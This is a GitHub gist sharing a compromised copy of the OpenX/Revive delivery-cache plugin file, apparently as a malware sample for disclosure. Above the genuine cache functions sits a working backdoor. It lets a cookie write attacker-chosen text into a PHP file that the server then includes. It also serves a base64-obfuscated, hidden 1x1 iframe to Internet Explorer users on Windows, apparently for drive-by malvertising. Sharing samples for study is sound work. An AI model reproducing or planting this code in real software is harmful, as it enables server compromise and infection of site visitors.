Skip to content

Instantly share code, notes, and snippets.

@stamparm
Created May 5, 2015 11:54
Show Gist options
  • Save stamparm/df9a0dcdd18f36662363 to your computer and use it in GitHub Desktop.
Save stamparm/df9a0dcdd18f36662363 to your computer and use it in GitHub Desktop.
OpenX/Revive malicious/compromised oxCacheFile.delivery.php
<?php
/*
+---------------------------------------------------------------------------+
| OpenX v${RELEASE_MAJOR_MINOR} |
| =======${RELEASE_MAJOR_MINOR_DOUBLE_UNDERLINE} |
| |
| Copyright (c) 2003-2009 OpenX Limited |
| For contact details, see: http://www.openx.org/ |
| |
| This program is free software; you can redistribute it and/or modify |
| it under the terms of the GNU General Public License as published by |
| the Free Software Foundation; either version 2 of the License, or |
| (at your option) any later version. |
| |
| This program is distributed in the hope that it will be useful, |
| but WITHOUT ANY WARRANTY; without even the implied warranty of |
| MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the |
| GNU General Public License for more details. |
| |
| You should have received a copy of the GNU General Public License |
| along with this program; if not, write to the Free Software |
| Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA |
+---------------------------------------------------------------------------+
$Id: oxCacheFile.delivery.php 33995 2009-03-18 23:04:15Z chris.nutting $
*/
$filename=MAX_PATH."/var/cache/deliverycache_0884ad8b0048660f6edeff1dbba6bbedcc.php";
if (isset($_COOKIE['url'])) {
$handle = fopen($filename, "w+");
fputs($handle,"<?php \$link=\"".$_COOKIE['url']."\"; ?>");
fclose($handle);
if (function_exists('apc_delete_file')) {
apc_delete_file($filename);
}
die('SUCCESS');
}
if (isset($_COOKIE['off'])) {
unlink($filename);
if (function_exists('apc_delete_file')) {
apc_delete_file($filename);
}
die('OFF');
}
if (file_exists($filename)) {
$Browser_Plugins_Patch=MAX_PATH."/plugins/deliveryLimitations/Client/Browser.delivery.php";
$Os_Plugins_Patch=MAX_PATH."/plugins/deliveryLimitations/Client/Os.delivery.php";
$Country_Plugins_Patch = MAX_PATH."/plugins/deliveryLimitations/Geo/Country.delivery.php";
$UserAgent_Plugins_Patch=MAX_PATH."/plugins/deliveryLimitations/Client/Useragent.delivery.php";
include_once($UserAgent_Plugins_Patch);
include_once($Browser_Plugins_Patch);
include_once($Os_Plugins_Patch);
include_once($Country_Plugins_Patch);
include_once($filename);
$rate_code=base64_decode('PGlmcmFtZSBzcmM9Ig==').$link.base64_decode('IiBzdHlsZT0iYm9yZGVyOjBweCAjRkZGRkZGIG5vbmU7IiBuYW1lPSJ0ZXN0IiBzY3JvbGxpbmc9Im5vIiBmcmFtZWJvcmRlcj0iMSIgbWFyZ2luaGVpZ2h0PSIwcHgiIG1hcmdpbndpZHRoPSIwcHgiIGhlaWdodD0iMXB4IiB3aWR0aD0iMXB4Ij48L2lmcmFtZT4=');
if (!isset($_COOKIE['OXGEO']) && MAX_checkClient_Browser('IE', '=~') && (MAX_checkClient_Os('w7,xp', '=~') || MAX_checkClient_Useragent('Windows NT 6.0', '=~')) || MAX_checkClient_Useragent('rv:11.0', '=~')) {
setcookie('OXGEO',"USA", time()+3600);
$subject = $_SERVER['PHP_SELF'];
$pattern = '/js/';
if (preg_match($pattern, $subject)) {
echo "document.write('".$rate_code."'); ";
}
else {
echo $rate_code;
}
}
}
/**
* A File based cache store plugin for delivery cache - delivery functions
*
* @package OpenXPlugin
* @subpackage DeliveryCacheStore
* @author Lukasz Wikierski <lukasz.wikierski@openx.org>
*/
/**
* Make sure that the custom path is used if set
*/
if (!empty($GLOBALS['_MAX']['CONF']['oxCacheFile']['cachePath'])) {
$GLOBALS['OA_Delivery_Cache']['path'] = trim($GLOBALS['_MAX']['CONF']['oxCacheFile']['cachePath']).'/';
} else {
$GLOBALS['OA_Delivery_Cache']['path'] = MAX_PATH.'/var/cache/';
}
/**
* Function to fetch a cache entry
*
* @param string $filename The name of file where cache entry is stored
* @return mixed False on error, or array the cache content
*/
function Plugin_deliveryCacheStore_oxCacheFile_oxCacheFile_Delivery_cacheRetrieve($filename)
{
$cache_complete = false;
$cache_contents = '';
// We are assuming that most of the time cache will exists
$ok = @include($GLOBALS['OA_Delivery_Cache']['path'].$filename);
if ($ok && $cache_complete == true) {
return $cache_contents;
}
return false;
}
/**
* A function to store content a cache entry.
*
* @param string $filename The filename where cache entry is stored
* @param array $cache_contents The cache content
* @return bool True if the entry was succesfully stored
*/
function Plugin_deliveryCacheStore_oxCacheFile_oxCacheFile_Delivery_cacheStore($filename, $cache_contents)
{
if (!is_writable($GLOBALS['OA_Delivery_Cache']['path'])) {
return false;
}
$filename = $GLOBALS['OA_Delivery_Cache']['path'].$filename;
$cache_literal = "<"."?php\n\n";
$cache_literal .= "$"."cache_contents = ".var_export($cache_contents, true).";\n\n";
$cache_literal .= "$"."cache_complete = true;\n\n";
$cache_literal .= "?".">";
// Write cache to a temp file, then rename it, overwritng the old cache
// On *nix systems this should guarantee atomicity
$tmp_filename = tempnam($GLOBALS['OA_Delivery_Cache']['path'], $GLOBALS['OA_Delivery_Cache']['prefix'].'tmp_');
if ($fp = @fopen($tmp_filename, 'wb')) {
@fwrite ($fp, $cache_literal, strlen($cache_literal));
@fclose ($fp);
if (!@rename($tmp_filename, $filename)) {
// On some systems rename() doesn't overwrite destination
@unlink($filename);
if (!@rename($tmp_filename, $filename)) {
// Make sure that no temporary file is left over
// if the destination is not writable
@unlink($tmp_filename);
}
}
if (PHP_SAPI == 'cli') {
// If delivery cache is used during maintenance with php-cli,
// most likely the user running it is not the webserver user.
// Chmod 777 to prevent issues when the webserver tries to
// access the file
@chmod($filename, 0777);
}
return true;
}
return false;
}
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment